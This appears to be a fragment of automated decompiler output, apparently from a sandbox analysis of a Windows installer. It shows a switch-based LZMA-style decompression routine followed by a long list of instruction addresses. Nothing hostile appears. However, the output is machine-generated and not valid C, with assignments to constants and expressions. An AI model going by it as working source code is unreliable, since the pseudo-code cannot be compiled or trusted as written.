                                                								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                								goto L23;
                                                							}
                                                							 *(_t614 - 0x74) = _t546;
                                                							if( *(_t614 - 8) != 0) {
                                                								GlobalFree( *(_t614 - 8)); // executed
                                                							}
                                                							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                							 *(_t614 - 8) = _t534;
                                                							if(_t534 == 0) {
                                                								goto L171;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						case 2:
                                                							L24:
                                                							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                							 *(_t614 - 0x84) = 6;
                                                							 *(_t614 - 0x4c) = _t553;
                                                							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                							goto L132;
                                                						case 3:
                                                							L21:
                                                							__eflags =  *(_t614 - 0x6c);
                                                							if( *(_t614 - 0x6c) == 0) {
                                                								 *(_t614 - 0x88) = 3;
                                                								goto L170;
                                                							}
                                                							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                							_t67 = _t614 - 0x70;
                                                							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                							__eflags =  *_t67;
                                                							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                							L23:
                                                							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                							if( *(_t614 - 0x48) != 0) {
                                                								goto L21;
                                                							}
                                                							goto L24;
                                                						case 4:
                                                							goto L133;
                                                						case 5:
                                                							goto L137;
                                                						case 6:
                                                							goto L0;
                                                						case 7:
                                                							__eflags =  *(__ebp - 0x40) - 1;
                                                							if( *(__ebp - 0x40) != 1) {
                                                								__eax =  *(__ebp - 0x24);
                                                								 *(__ebp - 0x80) = 0x16;
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x28);
                                                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                								__eax =  *(__ebp - 0x2c);
                                                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                								__eax = 0;
                                                								__eflags =  *(__ebp - 0x38) - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                								__eax =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 4) + 0x664;
                                                								__eflags = __eax;
                                                								 *(__ebp - 0x58) = __eax;
                                                								goto L68;
                                                							}
                                                							__eax =  *(__ebp - 4);
                                                							__ecx =  *(__ebp - 0x38);
                                                							 *(__ebp - 0x84) = 8;
                                                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                							goto L132;
                                                						case 8:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xa;
                                                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                							} else {
                                                								__eax =  *(__ebp - 0x38);
                                                								__ecx =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 0x38) + 0xf;
                                                								 *(__ebp - 0x84) = 9;
                                                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                							}
                                                							goto L132;
                                                						case 9:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								goto L89;
                                                							}
                                                							__eflags =  *(__ebp - 0x60);
                                                							if( *(__ebp - 0x60) == 0) {
                                                								goto L171;
                                                							}
                                                							__eax = 0;
                                                							__eflags =  *(__ebp - 0x38) - 7;
                                                							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                							__eflags = _t258;
                                                							0 | _t258 = _t258 + _t258 + 9;
                                                							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                							goto L75;
                                                						case 0xa:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xb;
                                                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x28);
                                                							goto L88;
                                                						case 0xb:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__ecx =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x20);
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                							} else {
                                                								__eax =  *(__ebp - 0x24);
                                                							}
                                                							__ecx =  *(__ebp - 0x28);
                                                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                							L88:
                                                							__ecx =  *(__ebp - 0x2c);
                                                							 *(__ebp - 0x2c) = __eax;
                                                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                							L89:
                                                							__eax =  *(__ebp - 4);
                                                							 *(__ebp - 0x80) = 0x15;
                                                							__eax =  *(__ebp - 4) + 0xa68;
                                                							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                							goto L68;
                                                						case 0xc:
                                                							L99:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xc;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t334 = __ebp - 0x70;
                                                							 *_t334 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t334;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							__eax =  *(__ebp - 0x2c);
                                                							goto L101;
                                                						case 0xd:
                                                							goto L36;
                                                						case 0xe:
                                                							goto L45;
                                                						case 0xf:
                                                							goto L57;
                                                						case 0x10:
                                                							L109:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x10;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t365 = __ebp - 0x70;
                                                							 *_t365 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t365;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							goto L111;
                                                						case 0x11:
                                                							L68:
                                                							__esi =  *(__ebp - 0x58);
                                                							 *(__ebp - 0x84) = 0x12;
                                                							goto L132;
                                                						case 0x12:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 0x58);
                                                								 *(__ebp - 0x84) = 0x13;
                                                								__esi =  *(__ebp - 0x58) + 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							__eflags = __eax;
                                                							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                							goto L130;
                                                						case 0x13:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								_t469 = __ebp - 0x58;
                                                								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                								__eflags =  *_t469;
                                                								 *(__ebp - 0x30) = 0x10;
                                                								 *(__ebp - 0x40) = 8;
                                                								L144:
                                                								 *(__ebp - 0x7c) = 0x14;
                                                								goto L145;
                                                							}
                                                							__eax =  *(__ebp - 0x4c);
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax =  *(__ebp - 0x4c) << 4;
                                                							 *(__ebp - 0x30) = 8;
                                                							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                							L130:
                                                							 *(__ebp - 0x58) = __eax;
                                                							 *(__ebp - 0x40) = 3;
                                                							goto L144;
                                                						case 0x14:
                                                							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                							__eax =  *(__ebp - 0x80);
                                                							goto L140;
                                                						case 0x15:
                                                							__eax = 0;
                                                							__eflags =  *(__ebp - 0x38) - 7;
                                                							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                							__al = __al & 0x000000fd;
                                                							__eax = (__eflags >= 0) - 1 + 0xb;
                                                							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                							goto L120;
                                                						case 0x16:
                                                							__eax =  *(__ebp - 0x30);
                                                							__eflags = __eax - 4;
                                                							if(__eax >= 4) {
                                                								_push(3);
                                                								_pop(__eax);
                                                							}
                                                							__ecx =  *(__ebp - 4);
                                                							 *(__ebp - 0x40) = 6;
                                                							__eax = __eax << 7;
                                                							 *(__ebp - 0x7c) = 0x19;
                                                							 *(__ebp - 0x58) = __eax;
                                                							goto L145;
                                                						case 0x17:
                                                							L145:
                                                							__eax =  *(__ebp - 0x40);
                                                							 *(__ebp - 0x50) = 1;
                                                							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                							goto L149;
                                                						case 0x18:
                                                							L146:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0x18;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t484 = __ebp - 0x70;
                                                							 *_t484 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t484;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L148:
                                                							_t487 = __ebp - 0x48;
                                                							 *_t487 =  *(__ebp - 0x48) - 1;
                                                							__eflags =  *_t487;
                                                							L149:
                                                							__eflags =  *(__ebp - 0x48);
                                                							if( *(__ebp - 0x48) <= 0) {
                                                								__ecx =  *(__ebp - 0x40);
                                                								__ebx =  *(__ebp - 0x50);
                                                								0 = 1;
                                                								__eax = 1 << __cl;
                                                								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                								__eax =  *(__ebp - 0x7c);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								goto L140;
                                                							}
                                                							__eax =  *(__ebp - 0x50);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                							__eax =  *(__ebp - 0x58);
                                                							__esi = __edx + __eax;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__ax =  *__esi;
                                                							__edi = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								__cx = __ax >> 5;
                                                								__eax = __eax - __ecx;
                                                								__edx = __edx + 1;
                                                								__eflags = __edx;
                                                								 *__esi = __ax;
                                                								 *(__ebp - 0x50) = __edx;
                                                							} else {
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edi;
                                                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L148;
                                                							} else {
                                                								goto L146;
                                                							}
                                                						case 0x19:
                                                							__eflags = __ebx - 4;
                                                							if(__ebx < 4) {
                                                								 *(__ebp - 0x2c) = __ebx;
                                                								L119:
                                                								_t393 = __ebp - 0x2c;
                                                								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                								__eflags =  *_t393;
                                                								L120:
                                                								__eax =  *(__ebp - 0x2c);
                                                								__eflags = __eax;
                                                								if(__eax == 0) {
                                                									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                									goto L170;
                                                								}
                                                								__eflags = __eax -  *(__ebp - 0x60);
                                                								if(__eax >  *(__ebp - 0x60)) {
                                                									goto L171;
                                                								}
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                								__eax =  *(__ebp - 0x30);
                                                								_t400 = __ebp - 0x60;
                                                								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                								__eflags =  *_t400;
                                                								goto L123;
                                                							}
                                                							__ecx = __ebx;
                                                							__eax = __ebx;
                                                							__ecx = __ebx >> 1;
                                                							__eax = __ebx & 0x00000001;
                                                							__ecx = (__ebx >> 1) - 1;
                                                							__al = __al | 0x00000002;
                                                							__eax = (__ebx & 0x00000001) << __cl;
                                                							__eflags = __ebx - 0xe;
                                                							 *(__ebp - 0x2c) = __eax;
                                                							if(__ebx >= 0xe) {
                                                								__ebx = 0;
                                                								 *(__ebp - 0x48) = __ecx;
                                                								L102:
                                                								__eflags =  *(__ebp - 0x48);
                                                								if( *(__ebp - 0x48) <= 0) {
                                                									__eax = __eax + __ebx;
                                                									 *(__ebp - 0x40) = 4;
                                                									 *(__ebp - 0x2c) = __eax;
                                                									__eax =  *(__ebp - 4);
                                                									__eax =  *(__ebp - 4) + 0x644;
                                                									__eflags = __eax;
                                                									L108:
                                                									__ebx = 0;
                                                									 *(__ebp - 0x58) = __eax;
                                                									 *(__ebp - 0x50) = 1;
                                                									 *(__ebp - 0x44) = 0;
                                                									 *(__ebp - 0x48) = 0;
                                                									L112:
                                                									__eax =  *(__ebp - 0x40);
                                                									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                										_t391 = __ebp - 0x2c;
                                                										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                										__eflags =  *_t391;
                                                										goto L119;
                                                									}
                                                									__eax =  *(__ebp - 0x50);
                                                									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                									__eax =  *(__ebp - 0x58);
                                                									__esi = __edi + __eax;
                                                									 *(__ebp - 0x54) = __esi;
                                                									__ax =  *__esi;
                                                									__ecx = __ax & 0x0000ffff;
                                                									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                									__eflags =  *(__ebp - 0xc) - __edx;
                                                									if( *(__ebp - 0xc) >= __edx) {
                                                										__ecx = 0;
                                                										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                										__ecx = 1;
                                                										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                										__ebx = 1;
                                                										__ecx =  *(__ebp - 0x48);
                                                										__ebx = 1 << __cl;
                                                										__ecx = 1 << __cl;
                                                										__ebx =  *(__ebp - 0x44);
                                                										__ebx =  *(__ebp - 0x44) | __ecx;
                                                										__cx = __ax;
                                                										__cx = __ax >> 5;
                                                										__eax = __eax - __ecx;
                                                										__edi = __edi + 1;
                                                										__eflags = __edi;
                                                										 *(__ebp - 0x44) = __ebx;
                                                										 *__esi = __ax;
                                                										 *(__ebp - 0x50) = __edi;
                                                									} else {
                                                										 *(__ebp - 0x10) = __edx;
                                                										0x800 = 0x800 - __ecx;
                                                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                										 *__esi = __dx;
                                                									}
                                                									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                									if( *(__ebp - 0x10) >= 0x1000000) {
                                                										L111:
                                                										_t368 = __ebp - 0x48;
                                                										 *_t368 =  *(__ebp - 0x48) + 1;
                                                										__eflags =  *_t368;
                                                										goto L112;
                                                									} else {
                                                										goto L109;
                                                									}
                                                								}
                                                								__ecx =  *(__ebp - 0xc);
                                                								__ebx = __ebx + __ebx;
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                								 *(__ebp - 0x44) = __ebx;
                                                								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                									__ecx =  *(__ebp - 0x10);
                                                									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                									__ebx = __ebx | 0x00000001;
                                                									__eflags = __ebx;
                                                									 *(__ebp - 0x44) = __ebx;
                                                								}
                                                								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                								if( *(__ebp - 0x10) >= 0x1000000) {
                                                									L101:
                                                									_t338 = __ebp - 0x48;
                                                									 *_t338 =  *(__ebp - 0x48) - 1;
                                                									__eflags =  *_t338;
                                                									goto L102;
                                                								} else {
                                                									goto L99;
                                                								}
                                                							}
                                                							__edx =  *(__ebp - 4);
                                                							__eax = __eax - __ebx;
                                                							 *(__ebp - 0x40) = __ecx;
                                                							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                							goto L108;
                                                						case 0x1a:
                                                							goto L55;
                                                						case 0x1b:
                                                							L75:
                                                							__eflags =  *(__ebp - 0x64);
                                                							if( *(__ebp - 0x64) == 0) {
                                                								 *(__ebp - 0x88) = 0x1b;
                                                								goto L170;
                                                							}
                                                							__eax =  *(__ebp - 0x14);
                                                							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                							__eflags = __eax -  *(__ebp - 0x74);
                                                							if(__eax >=  *(__ebp - 0x74)) {
                                                								__eax = __eax +  *(__ebp - 0x74);
                                                								__eflags = __eax;
                                                							}
                                                							__edx =  *(__ebp - 8);
                                                							__cl =  *(__eax + __edx);
                                                							__eax =  *(__ebp - 0x14);
                                                							 *(__ebp - 0x5c) = __cl;
                                                							 *(__eax + __edx) = __cl;
                                                							__eax = __eax + 1;
                                                							__edx = 0;
                                                							_t274 = __eax %  *(__ebp - 0x74);
                                                							__eax = __eax /  *(__ebp - 0x74);
                                                							__edx = _t274;
                                                							__eax =  *(__ebp - 0x68);
                                                							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                							_t283 = __ebp - 0x64;
                                                							 *_t283 =  *(__ebp - 0x64) - 1;
                                                							__eflags =  *_t283;
                                                							 *( *(__ebp - 0x68)) = __cl;
                                                							goto L79;
                                                						case 0x1c:
                                                							while(1) {
                                                								L123:
                                                								__eflags =  *(__ebp - 0x64);
                                                								if( *(__ebp - 0x64) == 0) {
                                                									break;
                                                								}
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__edx =  *(__ebp - 8);
                                                								__cl =  *(__eax + __edx);
                                                								__eax =  *(__ebp - 0x14);
                                                								 *(__ebp - 0x5c) = __cl;
                                                								 *(__eax + __edx) = __cl;
                                                								__eax = __eax + 1;
                                                								__edx = 0;
                                                								_t414 = __eax %  *(__ebp - 0x74);
                                                								__eax = __eax /  *(__ebp - 0x74);
                                                								__edx = _t414;
                                                								__eax =  *(__ebp - 0x68);
                                                								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                								__eflags =  *(__ebp - 0x30);
                                                								 *( *(__ebp - 0x68)) = __cl;
                                                								 *(__ebp - 0x14) = __edx;
                                                								if( *(__ebp - 0x30) > 0) {
                                                									continue;
                                                								} else {
                                                									goto L80;
                                                								}
                                                							}
                                                							 *(__ebp - 0x88) = 0x1c;
                                                							goto L170;
                                                					}
                                                				}
                                                			}













                                                0x004064e9
                                                0x004064ec
                                                0x004064f9
                                                0x004064fc
                                                0x004064fc
                                                0x00000000
                                                0x00000000
                                                0x00406520
                                                0x00406524
                                                0x00000000
                                                0x00000000
                                                0x0040652a
                                                0x0040652e
                                                0x00000000
                                                0x00000000
                                                0x00406534
                                                0x00406536
                                                0x0040653a
                                                0x0040653a
                                                0x0040653d
                                                0x00406541
                                                0x00000000
                                                0x00000000
                                                0x00406591
                                                0x00406595
                                                0x0040659c
                                                0x0040659f
                                                0x004065a2
                                                0x004065ac
                                                0x00000000
                                                0x004065ac
                                                0x00406597
                                                0x00000000
                                                0x00000000
                                                0x004065b8
                                                0x004065bc
                                                0x004065c3
                                                0x004065c6
                                                0x004065c9
                                                0x004065be
                                                0x004065be
                                                0x004065be
                                                0x004065cc
                                                0x004065cf
                                                0x004065d2
                                                0x004065d2
                                                0x004065d5
                                                0x004065d8
                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00000000
                                                0x00000000
                                                0x0040680a
                                                0x0040680e
                                                0x00406830
                                                0x00406833
                                                0x0040683d
                                                0x00000000
                                                0x0040683d
                                                0x00406810
                                                0x00406813
                                                0x00406817
                                                0x0040681a
                                                0x0040681a
                                                0x0040681d
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x004068fe
                                                0x004068fe
                                                0x00000000
                                                0x004068fe
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00406821
                                                0x00406821
                                                0x00406824
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00406905
                                                0x00406905
                                                0x00406908
                                                0x0040690f
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x0040693c
                                                0x0040693c
                                                0x00406940
                                                0x004069a0
                                                0x004069a3
                                                0x004069a8
                                                0x004069a9
                                                0x004069ab
                                                0x004069ad
                                                0x004069b0
                                                0x00000000
                                                0x004069b0
                                                0x00406942
                                                0x00406948
                                                0x0040694b
                                                0x0040694e
                                                0x00406951
                                                0x00406954
                                                0x00406957
                                                0x0040695a
                                                0x0040695d
                                                0x00406960
                                                0x00406963
                                                0x0040697c
                                                0x0040697f
                                                0x00406982
                                                0x00406985
                                                0x00406989
                                                0x0040698b
                                                0x0040698b
                                                0x0040698c
                                                0x0040698f
                                                0x00406965
                                                0x00406965
                                                0x0040696d
                                                0x00406972
                                                0x00406974
                                                0x00406977
                                                0x00406977
                                                0x00406992
                                                0x00406999
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x0040699b
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406544
                                                0x00406544
                                                0x00406548
                                                0x00406a0e
                                                0x00000000
                                                0x00406a0e
                                                0x0040654e
                                                0x00406551
                                                0x00406554
                                                0x00406557
                                                0x00406559
                                                0x00406559
                                                0x00406559
                                                0x0040655c
                                                0x0040655f
                                                0x00406562
                                                0x00406565
                                                0x00406568
                                                0x0040656b
                                                0x0040656c
                                                0x0040656e
                                                0x0040656e
                                                0x0040656e
                                                0x00406571
                                                0x00406574
                                                0x00406577
                                                0x0040657a
                                                0x0040657a
                                                0x0040657a
                                                0x0040657d
                                                0x00000000
                                                0x00000000
                                                0x004067c1
                                                0x004067c1
                                                0x004067c1
                                                0x004067c5
                                                0x00000000
                                                0x00000000
                                                0x004067cb
                                                0x004067ce
                                                0x004067d1
                                                0x004067d4
                                                0x004067d6
                                                0x004067d6
                                                0x004067d6
                                                0x004067d9
                                                0x004067dc
